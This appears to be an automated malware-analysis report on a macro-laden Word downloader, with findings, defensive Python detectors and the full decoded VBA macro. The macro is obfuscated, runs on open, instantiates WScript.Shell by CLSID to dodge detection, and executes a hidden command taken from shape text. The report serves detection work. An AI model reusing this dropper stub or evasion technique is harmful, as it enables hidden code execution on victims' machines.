MALICIOUS
Risk Score: 252
Heuristics: 9

ClamAV: Doc.Downloader.Sagent-6770698-0 [critical] CLAMAV_DETECTION
ClamAV detected this file as malware: Doc.Downloader.Sagent-6770698-0

VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
Document contains VBA macro code

VBA instantiates a dangerous COM class by CLSID [critical] OLE_VBA_GETOBJECT_CLSID_DANGEROUS
VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. On a standard Windows install, {72C24DD5-D70A-438B-8A42-98424B88AFB8} is the CLSID of WScript.Shell, which exposes the Run method the macro later calls (ukMzHfzwu.Run@ WfOWA, tcRWMjZ). An analyst can confirm the mapping under HKEY_CLASSES_ROOT\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID; a rule that only looks for CreateObject("WScript.Shell") never sees this form.
Matched line in script:
  tVFqTQW = 34481543 + CByte(wbmaKk - Sqr(WRCFzE)) * hnjWEJKTd - IzMBQtJ * opTGBist / CDate(227834830) * 70487161 * 106106507 / (170155314 - Sin(219959538))
  Set ukMzHfzwu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
  On Error Resume Next

GetObject call [high] OLE_VBA_GETOBJ
GetObject call
Matched line in script:
  tVFqTQW = 34481543 + CByte(wbmaKk - Sqr(WRCFzE)) * hnjWEJKTd - IzMBQtJ * opTGBist / CDate(227834830) * 70487161 * 106106507 / (170155314 - Sin(219959538))
  Set ukMzHfzwu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
  On Error Resume Next

AutoOpen macro [low] OLE_VBA_AUTOOPEN
AutoOpen macro
Matched line in script:
  Attribute VB_Customizable = True
  Sub AutoOpen()
  On Error Resume Next

Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD
Suspicious cmd.exe invocation with execution flag. No matched line is reported for this finding, and the decoded macro body contains no cmd.exe string: the command line is assembled at run time from the text of shape MNjXrXSCdi (Set ZYkGk = Shapes("MNjXrXSCdi") ... ZYkGk.TextFrame.TextRange.Text) and handed to the COM object's Run method with window style 0 (Const tcRWMjZ = 0). Expect the matched string in the shape text carried by the document, not in the VBA source shown below, and check that text when reconstructing the executed command.

Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the "no modern VBA project was recovered" condition does not hold: olevba did extract the VBA project (macros.bas below) and its AutoOpen is the marker this rule keyed on, so treat this finding as a duplicate of OLE_VBA_AUTOOPEN rather than as independent evidence.

Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Embedded URL [info] EMBEDDED_URL
One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office writes into documents containing drawing objects such as the shape the macro reads; it is not a network indicator and is not contacted at run time.

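The CLSID instantiation, shape-text staging and hidden Run call described in the findings above can be checked statically on the decoded VBA. The Python below is an added example, not part of the analyzer or of this report: the EXEC_CLSIDS map, the regular expressions and the verdict wording are this example's own assumptions, and SAMPLE is a condensed excerpt of the preview script further down the page.

```python
"""Static triage for the evasion pattern this report flags (added example).

Looks for: a COM class instantiated by raw CLSID via GetObject("new:..."),
a command line staged in a document shape's text, and a .Run call with a
hidden window style. The CLSID map is an analyst-maintained assumption.
"""
import re
from dataclasses import dataclass, field

# Assumption: small reference map; extend with data from your own environment.
# 72C24DD5-... is the CLSID in the report's macro and resolves to WScript.Shell.
EXEC_CLSIDS = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
}

CLSID_RE = re.compile(r'GetObject\s*\(\s*"new:\{?([0-9A-F-]{36})\}?"\s*\)', re.I)
SHAPE_RE = re.compile(r'Set\s+(\w+)\s*=\s*(?:\w+\.)*Shapes\s*\(\s*"([^"]+)"\s*\)', re.I)
CONST_RE = re.compile(r'\bConst\s+(\w+)\s*=\s*(\d+)', re.I)
# VBA accepts a type-declaration character (@ ! # $ % & ^) after a method name,
# so "Run@" is legal and defeats a naive ".Run " substring match.
RUN_RE = re.compile(r'(\w+)\s*\.\s*Run\s*[@!#$%&^]?\s*\(?\s*(\w+)\s*,\s*(\w+)', re.I)
PROGID_RE = re.compile(r'CreateObject\s*\(\s*"(WScript\.Shell|Shell\.Application)"', re.I)


@dataclass
class Triage:
    clsids: dict = field(default_factory=dict)         # CLSID -> resolved name or None
    staged_shapes: list = field(default_factory=list)  # shapes whose text feeds a variable
    hidden_runs: list = field(default_factory=list)    # (object var, command var), style 0


def name_based_hit(src: str) -> bool:
    """What a ProgID-keyed rule sees: nothing, for the CLSID form."""
    return PROGID_RE.search(src) is not None


def triage_vba(src: str) -> Triage:
    t = Triage()
    for m in CLSID_RE.finditer(src):
        clsid = m.group(1).upper()
        t.clsids[clsid] = EXEC_CLSIDS.get(clsid)
    consts = {name: int(val) for name, val in CONST_RE.findall(src)}
    for var, shape in SHAPE_RE.findall(src):
        # Staging: the shape's text is read back into the macro somewhere.
        if re.search(rf'\b{re.escape(var)}\s*\.\s*TextFrame\s*\.\s*TextRange\s*\.\s*Text\b', src, re.I):
            t.staged_shapes.append(shape)
    for obj, cmd, style in RUN_RE.findall(src):
        value = int(style) if style.isdigit() else consts.get(style)
        if value == 0:  # WScript.Shell.Run intWindowStyle 0 = hidden window
            t.hidden_runs.append((obj, cmd))
    return t


def verdict(t: Triage) -> str:
    if t.clsids and t.hidden_runs:
        return "critical: COM object instantiated by CLSID, command run with hidden window"
    if t.clsids:
        return "high: COM object instantiated by raw CLSID"
    return "none"


# Constructed input: a condensed excerpt of the report's preview script.
SAMPLE = '''Sub AutoOpen()
On Error Resume Next
Set ZYkGk = Shapes("MNjXrXSCdi")
WfOWA = "" + nmUop + hHGhPXD + ZYkGk.TextFrame.TextRange.Text + Xkzzupc
Set ukMzHfzwu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
Const tcRWMjZ = 0
ukMzHfzwu.Run@ WfOWA, tcRWMjZ
End Sub
'''

if __name__ == "__main__":
    result = triage_vba(SAMPLE)
    print("ProgID rule fires:", name_based_hit(SAMPLE))
    print("CLSIDs:", result.clsids)
    print("staged shapes:", result.staged_shapes)
    print("hidden runs:", result.hidden_runs)
    print(verdict(result))
```

Run it against the full macros.bas rather than the excerpt to see the same three hits; the point of resolving the CLSID against a map is that the report's raw identifier becomes an actionable name (WScript.Shell) without executing the document, and an unknown CLSID still gets reported as None for manual lookup.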
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9154 bytes |

SHA-256: 24a9459d67fc476ca49adbc5651bca077556fae9720531f2c8f77a4782507258

Detection (macros.bas):
ClamAV: No threats found. The Doc.Downloader.Sagent-6770698-0 signature above matched the sample file itself, not the decoded VBA source, so a clean per-artifact scan here does not weaken the top-level verdict.
Obfuscation or payload: likely. 169 of 236 identifiers look randomly generated (e.g. 'MNjXrXSCdi'), consistent with name-mangling obfuscation.

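The "identifiers look randomly generated" ratio above is a heuristic, and the analyzer's scorer is not shown on this page. The Python below is an added example, not the analyzer's code: its keyword list and its three rules (no vowels, a long consonant run, upper-heavy mixed case) are this example's own assumptions, so its count will differ from the report's 169 of 236. SAMPLE is a condensed excerpt of the preview script below.

```python
"""Name-mangling heuristic for VBA identifiers (added example).

Reproduces the shape of the report's "N of M identifiers look randomly
generated" signal. The keyword list and the three rules below are this
example's assumptions, not the analyzer's scorer, so counts will differ.
"""
import re

VBA_KEYWORDS = {
    "sub", "end", "function", "dim", "as", "set", "let", "if", "then", "else",
    "elseif", "for", "to", "step", "next", "do", "loop", "while", "wend",
    "select", "case", "on", "error", "resume", "goto", "const", "private",
    "public", "true", "false", "nothing", "new", "call", "exit", "with",
    "each", "in", "not", "and", "or", "is", "mod", "attribute",
}
VOWELS = set("aeiou")


def extract_identifiers(src: str) -> list:
    """Unique identifiers, ignoring Attribute lines, string literals, comments and keywords."""
    seen = set()
    for line in src.splitlines():
        if line.lstrip().lower().startswith("attribute "):
            continue
        line = re.sub(r'"[^"]*"', '""', line)   # drop string contents (shape names, CLSIDs)
        line = line.split("'", 1)[0]             # drop trailing comment
        for tok in re.findall(r'\b[A-Za-z_]\w*\b', line):
            if tok.lower() not in VBA_KEYWORDS:
                seen.add(tok)
    return sorted(seen)


def looks_random(name: str) -> bool:
    """Three cheap signals: no vowels, a long consonant run, or upper-heavy mixed case."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 4:                         # too short to judge
        return False
    if not any(c.lower() in VOWELS for c in letters):
        return True                              # tcRWMjZ, ZYkGk
    run = best = 0
    for c in name:
        if c.isalpha() and c.lower() not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    if best >= 5:                                # ukMzHfzwu (kMzHfzw)
        return True
    upper = sum(c.isupper() for c in letters)
    lower = len(letters) - upper
    return lower > 0 and upper > lower           # WfOWA, but not ALLCAPS constants


def mangling_ratio(src: str):
    """Return (flagged identifiers, total identifiers)."""
    names = extract_identifiers(src)
    flagged = [n for n in names if looks_random(n)]
    return flagged, len(names)


# Constructed input: a condensed excerpt of the report's preview script.
SAMPLE = '''Attribute VB_Name = "wpdEzDp"
Sub AutoOpen()
On Error Resume Next
Set ZYkGk = Shapes("MNjXrXSCdi")
WfOWA = "" + nmUop + ZYkGk.TextFrame.TextRange.Text
Set ukMzHfzwu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
Const tcRWMjZ = 0
ukMzHfzwu.Run@ WfOWA, tcRWMjZ
End Sub
'''

if __name__ == "__main__":
    flagged, total = mangling_ratio(SAMPLE)
    print(f"{len(flagged)} of {total} identifiers look randomly generated: {flagged}")
```

Short mangled names such as nmUop slip through these rules, which is why the report's own figure is a ratio rather than a verdict: on a macro this size, a majority of non-keyword identifiers failing even cheap pronounceability checks is what justifies the "likely" label, and Office object-model names (Shapes, TextFrame, GetObject) pass so they do not inflate it.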
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "wpdEzDp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case GcPVF
Case 263436650
THtHiwi = 191660783
lMHlsmEMv = Maavh
rKSStt = 302878662
Case 165349987
AzWsfFIcM = ChrW(74511125)
BKQTYCa = CDate(339146662)
BsLMsql = 106430339
End Select
wsSivs = 256104350 + CByte(UPzEwOkL - Sqr(huwurT)) * zoHoKApTs - PTCSPY * riLzXDia / CDate(3153011) * 204304949 * 60075319 / (287081616 - Sin(118075064))
On Error Resume Next
Select Case iNbfIAw
Case 121719036
FvvawL = 276936712
PPlhrVXl = wYhfYrm
uXVlhXpd = 140347976
Case 282054125
kjrUz = ChrW(25661779)
hCnmsEu = CDate(214692276)
akljE = 62795709
End Select
EoUDhrvEW = 201621771 + CByte(ArHDkb - Sqr(JjwHiRrAV)) * sjJwbt - jcArpGjQ * jtovWA / CDate(68613936) * 219605088 * 310521552 / (170807698 - Sin(297779734))
On Error Resume Next
Select Case bwsjZbzfF
Case 289083375
OUwnTNs = 122744589
zcAimzA = qMYTi
wuApDbE = 138925525
Case 243935618
DapWmER = ChrW(4972637)
wswzJwbbu = CDate(269750082)
TCjzwtSXo = 283571101
End Select
crWfMH = 198803648 + CByte(mvYYic - Sqr(wqsbAKjrL)) * qqXsl - MEcQGbikT * dCwudBWzz / CDate(185008084) * 200651955 * 85697153 / (282622219 - Sin(61020892))
Set ZYkGk = Shapes("MNjXrXSCdi")
On Error Resume Next
Select Case ibihtl
Case 24402893
zlVkoRAt = 693405
cfRov = kmSwbKNs
wpdtzqDAn = 203711241
Case 148449080
jljDbEsh = ChrW(314165613)
pjwwHTFNm = CDate(160850788)
krcXzCM = 161295610
End Select
dJYuDAlv = 341357095 + CByte(ULECA - Sqr(uBjkvaswM)) * tEfbCjJQQ - IEsGhJNj * Rjpba / CDate(33886899) * 8161701 * 193970129 / (264200308 - Sin(238016161))
On Error Resume Next
Select Case krVANzQdK
Case 139644904
kLwtE = 250804154
pXiMIji = tXbOOzFS
oGZoMdAX = 262214495
Case 205744771
JQqOZsplN = ChrW(159147862)
mRfEtBvG = CDate(65324508)
tNFzMqdu = 192772141
End Select
UDlYcjMp = 145991082 + CByte(TFMFU - Sqr(JHjzb)) * VRPClRMB - qkiNij * bNoFk / CDate(10571634) * 79505312 * 264921984 / (8269212 - Sin(337088490))
On Error Resume Next
Select Case cQFjTXHqi
Case 204005928
pTsrONhYH = 48950043
zFzOIRm = EdCQtf
WIdfzc = 274175824
Case 4421112
mcikAQiLm = ChrW(39192829)
zmEPpE = CDate(119238342)
MmDzLAq = 166339378
End Select
cKuKFGcfj = 10213677 + CByte(ozrinP - Sqr(kDOpsK)) * oDidWk - rkibL * ufbjG / CDate(20002261) * 39118320 * 251691701 / (82710700 - Sin(309965106))
WfOWA = "" + nmUop + hHGhPXD + DlNMuvP + ZYkGk.TextFrame.TextRange.Text + Xkzzupc + FWBDVjM + sDHlPt
On Error Resume Next
Select Case nMjVV
Case 30160650
jOWaswRiP = 45493870
IZuWoEi = sOcwQjoS
szpEuKWcH = 220358748
Case 322712112
wiANXZQN = ChrW(107835435)
bnmLiEQ = CDate(39447712)
DdSmRRQNO = 159963436
End Select
hXlBwjckt = 48444978 + CByte(FiUWCRi - Sqr(SLBntDds)) * wGMBpVqE - lPubj * mfYkSv / CDate(95028842) * 332639990 * 199840180 / (222891092 - Sin(38834161))
On Error Resume Next
Select Case KvPDri
Case 191297648
ZREFiN = 14420907
ZTzrtWiH = OJGWVlKU
WYUjTljUX = 250879166
Case 198720959
viGcwVjW = ChrW(162357136)
MIQdZXwD = CDate(209503444)
koqdMpzLK = 161118519
End Select
wdzSiztXP = 200417369 + CByte(RiLMTqLJY - Sqr(GjCHnc)) * IVULAp - iQKuXC * PPlWHRzW / CDate(65697959) * 338241681 * 4134581 / (934629 - Sin(201421381))
On Error Resume Next
Select Case vcMiGmVV
Case 129140243
mjwQDuE = 315158117
PwHiLNCqX = DtqojX
hDJpjME = 135707370
Case 70690743
bNiJUQdM = ChrW(233152322)
zBREwzEQ = CDate(225922523)
uMtaNAmCj = 237424333
End Select
KAbbc = 298625414 + CByte(jcMcA - Sqr(fflFtiIo)) * OrOUDvTd - dzknApd * EwhFiR / CDate(79943163) * 63355943 * 310337442 / (221345257 - Sin(99511558))
On Error Resume Next
Select Case aijliCfw
Case 142477893
hISUCGW = 14226887
qtujwaCu = hffIG
JzwkWRoK = 253712995
Case 194981335
ZDpzi = ChrW(141567755)
KtufvmLbI = CDate(172317384)
qsZBjL = 18276332
End Select
lfSCi = 51525766 + CByte(tBzFF - Sqr(JkzMo)) * DJZvJOv - kdXTiwUjP * rMXqsJbDU / CDate(84438727) * 213964587 * 54349214 / (180717504 - Sin(274030804))
On Error Resume Next
Select Case RGzSLKDC
Case 125939278
jVQIq = 36725401
JwjzLC = VddbPq
NPapai = 41618076
Case 287200199
FLkri = ChrW(48787822)
MZJtH = CDate(100769011)
nFDdzhhc = 257504231
End Select
tVFqTQW = 34481543 + CByte(wbmaKk - Sqr(WRCFzE)) * hnjWEJKTd - IzMBQtJ * opTGBist / CDate(227834830) * 70487161 * 106106507 / (170155314 - Sin(219959538))
Set ukMzHfzwu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case iiOiqA
Case 164646099
bKLMcinb = 114016733
WvihMlvX = NSiRpw
hnwVUZ = 82696935
Case 265222959
tpNonSW = ChrW(264230921)
zWkwVdiS = CDate(208878811)
NwtWOJ = 6275558
End Select
fvNzj = 307186509 + CByte(Tvhjhv - Sqr(qlqbilRTm)) * tBbaz - zimRrs * BnplBh / CDate(6706182) * 231290995 * 332089702 / (101738451 - Sin(113458398))
Const tcRWMjZ = 0
On Error Resume Next
Select Case RSfBfGjUB
Case 315105100
KNljKaVQd = 84764015
DREkMuMr = nPPYB
VmJwbu = 294937281
Case 228122774
PAXMOU = ChrW(325381757)
jiPNw = CDate(304701431)
oHJmGvwNh = 337192519
End Select
iGhks = 68830597 + CByte(nVLXAdop - Sqr(jumwY)) * PHUlFcWQn - NJlqcvmE * JYiRGjw / CDate(111114131) * 270717960 * 99506182 / (124783221 - Sin(313928693))
On Error Resume Next
Select Case DlMHoqz
Case 224563091
TYXsJv = 62035173
boVBYv = PMrhWzh
SorAzMEw = 88551315
Case 142188208
PHLOn = ChrW(67936010)
jGPwdf = CDate(275852842)
rbzRLQlr = 32584410
End Select
RvMDX = 291880822 + CByte(fRjQE - Sqr(DXJPbRVLM)) * IUczvK - dPGKWPAfj * ozNJYnd / CDate(314528346) * 304452013 * 13062551 / (5702838 - Sin(66837163))
ukMzHfzwu.Run@ WfOWA, tcRWMjZ
On Error Resume Next
Select Case IvpAnXrjb
Case 266364908
ZAjSBp = 191931568
AFwjhMuup = CcGzHGqzK
INwJMcvos = 241803611
Case 27851092
zXamKLIo = ChrW(296285901)
BlYMGbs = CDate(191709487)
DflkmIo = 156082336
End Select
QFBEq = 88789302 + CByte(jWVwfoV - Sqr(fLLkzWTwP)) * AJNmo - VnDXnbw * LjWFXhzOJ / CDate(254909657) * 32002073 * 178378384 / (323523941 - Sin(29194606))
On Error Resume Next
Select Case LNZOcoE
Case 333531499
CGaJuDMzU = 341821043
uFZka = jEjZqA
XTmzIXW = 105997166
Case 11057061
JzPJzCmmm = ChrW(109680534)
cFoonPFAP = CDate(173078773)
GzlaRN = 282026166
End Select
dosNPnLDl = 14918863 + CByte(nEjkvNwLV - Sqr(RPmRz)) * PYWkZvonC - sYBcLTwT * HWPpNTBV / CDate(272628350) * 77469207 * 160514777 / (45073434 - Sin(312546685))
On Error Resume Next
Select Case LuRKbK
Case 92027715
RWJiCCww = 240509802
DoasI = bJdhzXAWH
sNtWaJffL = 164760623
Case 272594995
bcDaHQ = ChrW(42842740)
tTmRjRhji = CDate(297689010)
nbJJjCO = 186669986
End Select
IvjjKHhAi = 153560651 + CByte(jQLAYa - Sqr(mJczwSD)) * rSTTX - oMnznDHbk * CLclWQIk / CDate(59035877) * 177299059 * 183083791 / (126792400 - Sin(117109786))
On Error Resume Next
Select Case dsNGnQbbu
Case 325072298
zASQU = 33533068
YRFKQtkX = ztUDRXfw
OWoff = 192339709
Case 259080049
zhvdbFbv = ChrW(125403047)
mSbTWQh = CDate(198464871)
ZtncUVKG = 226077694
End Select
smcXiuDbG = 144790576 + CByte(tIwvtdiu - Sqr(YwBuN)) * LFbHRzsA - pKutYTp * Iufkojb / CDate(289850899) * 209362990 * 78499474 / (223519411 - Sin(145405883))
End Sub